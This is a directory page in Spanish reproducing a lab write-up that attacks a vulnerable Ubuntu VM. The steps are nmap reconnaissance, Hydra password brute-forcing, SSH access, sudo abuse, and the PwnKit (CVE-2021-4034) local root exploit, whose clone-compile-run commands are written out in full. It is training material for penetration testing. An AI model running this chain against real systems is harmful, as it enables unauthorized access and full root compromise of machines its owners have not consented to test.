Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ubuntu-privesc-lab — Flujo de trabajo completo de pruebas de penetración: fuerza bruta de credenciales, acceso SSH y escalada de privilegios (CVE-2021-4034) | Kitploit
Herramientas/GitHubGitHub/vaibhavkrishna12004/ubuntu-privesc-lab
Escalada de PrivilegiosReconocimientoMapeo de RedesAtaques de ContraseñasEscaneo de PuertosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónMala Configuración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
Labs y Práctica
GitHubvaibhavkrishna12004/ubuntu-privesc-lab

ubuntu-privesc-lab

Flujo de trabajo completo de pruebas de penetración: fuerza bruta de credenciales, acceso SSH y escalada de privilegios (CVE-2021-4034)

Ver Repositorio
hace 4 mesesAún no revisado

ubuntu-privesc-lab

Flujo de trabajo completo de pruebas de penetración: fuerza bruta de credenciales, acceso SSH y escalada de privilegios (CVE-2021-4034)

VISIÓN GENERAL

Este proyecto demuestra un flujo de trabajo completo de pruebas de penetración contra una máquina virtual Ubuntu vulnerable. La cadena de ataque incluye reconocimiento, fuerza bruta de credenciales, acceso inicial y escalada de privilegios mediante múltiples técnicas.

HERRAMIENTAS UTILIZADAS

Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)

RECONOCIMIENTO

El reconocimiento se realizó con Nmap, que reveló la cantidad de hosts abiertos en la red específica (wifi). nmap < Network IP 0/24 > : Esto reveló la cantidad de hosts activos y sus direcciones MAC. Recon para encontrar VM 1

Como se observó, la VM se ejecutaba en ORACLE VIRTUAL BOX, pudimos deducir que esta era nuestra VM vulnerable y la IP correspondiente.

Recon para VM 2

Un escaneo adicional reveló puertos vulnerables abiertos para ataque.

EXPLOTACIÓN PRIMARIA

Usando eso, intenté con éxito un ataque de fuerza bruta de credenciales con la ayuda de Hydra. hydra -l < USERNAME > or -L < File.txt > -p < PASSWORD > or -P < File.txt > < TARGET IP > < PORT >

Hydra para VM vulnerable

Esta explotación exitosa de contraseña nos llevó a usar las credenciales también para la explotación del puerto SSH.

ssh < USERNAME@TARGET IP > Password < exploit password >

Explotación SSH usando credenciales obtenidas de la contraseña

Esto nos dio el acceso inicial a nuestro sistema víctima. Además, la mala configuración de sudo nos otorgó acceso completo a la raíz. sudo -l : (ALL : ALL) ALL

sudo su fue la escalada.

EXPLOTACIÓN SECUNDARIA

Continuamos explotando el sistema víctima con la ayuda de "Pwnkit CVE-2021-4034".

PwnKit (CVE-2021-4034) es una vulnerabilidad de seguridad crítica descubierta a principios de 2022 por el equipo de investigación de Qualys, que afecta al framework Polkit en sistemas Linux. Es un fallo de escalada local de privilegios (LPE) que permite a cualquier usuario estándar sin privilegios obtener privilegios completos de root (acceso administrativo) en un sistema. La vulnerabilidad existe desde la introducción de Polkit en 2009 y se considera "trivial" de explotar, lo que la hace muy peligrosa.

Common Vulnerabilities and Exposures (CVE) es una lista estandarizada y divulgada públicamente de vulnerabilidades y exposiciones de ciberseguridad en software y hardware.

INSTALANDO CVE-2021-4034 Y EXPLOTANDO LA VM

Primero, confirmé que el sistema objetivo era potencialmente vulnerable verificando la presencia y permisos de pkexec: which pkexec output: ls -la /usr/bin/pkexec El binario tenía el bit SUID activado, lo que indica que se ejecuta con privilegios de root, convirtiéndolo en un objetivo viable para la explotación.

Preparar el entorno

Para compilar el exploit, se instalaron las herramientas necesarias: sudo apt update sudo apt install git build-essential -y Esto aseguró que el sistema tuviera el compilador y las dependencias necesarias. Si el apt del sistema tiene tareas en segundo plano en ejecución, deténgalas.

Transferir / Obtener el código del exploit

El exploit se clonó directamente en la máquina víctima: cd /tmp git clone https://github.com/berdav/CVE-2021-4034.git cd CVE-2021-4034 Usar /tmp evita el desorden y refleja el comportamiento realista de un atacante. Instalando CVE-2021-4034 Instalación de Git para CVE KIT

Compilar el exploit

El exploit se compiló usando: "make"

Esto generó el ejecutable necesario para desencadenar la vulnerabilidad.

Ejecutar el exploit

El exploit se ejecutó: ./cve-2021-4034

Verificar la escalada de privilegios

Después de la ejecución, se confirmó el acceso root: whoami

Output: root

Explotación de privilegios y acceso a la VM

Este exploit funciona porque pkexec maneja incorrectamente las variables de entorno, lo que permite a los atacantes ejecutar código arbitrario con privilegios elevados.

CONCLUSIÓN

Este ejercicio demuestra cómo un usuario aparentemente con pocos privilegios puede escalar al control total del sistema explotando una vulnerabilidad conocida como PwnKit (CVE-2021-4034). Al combinar el acceso inicial mediante la compromisión de credenciales con una enumeración y explotación sistemáticas, fue posible obtener acceso root sin depender únicamente de malas configuraciones. Esto resalta la importancia crítica de la gestión oportuna de parches y las prácticas de configuración segura. Incluso una sola vulnerabilidad pasada por alto puede llevar al compromiso completo del sistema, enfatizando la necesidad de evaluaciones de seguridad continuas y estrategias de defensa en profundidad.

Descargar herramienta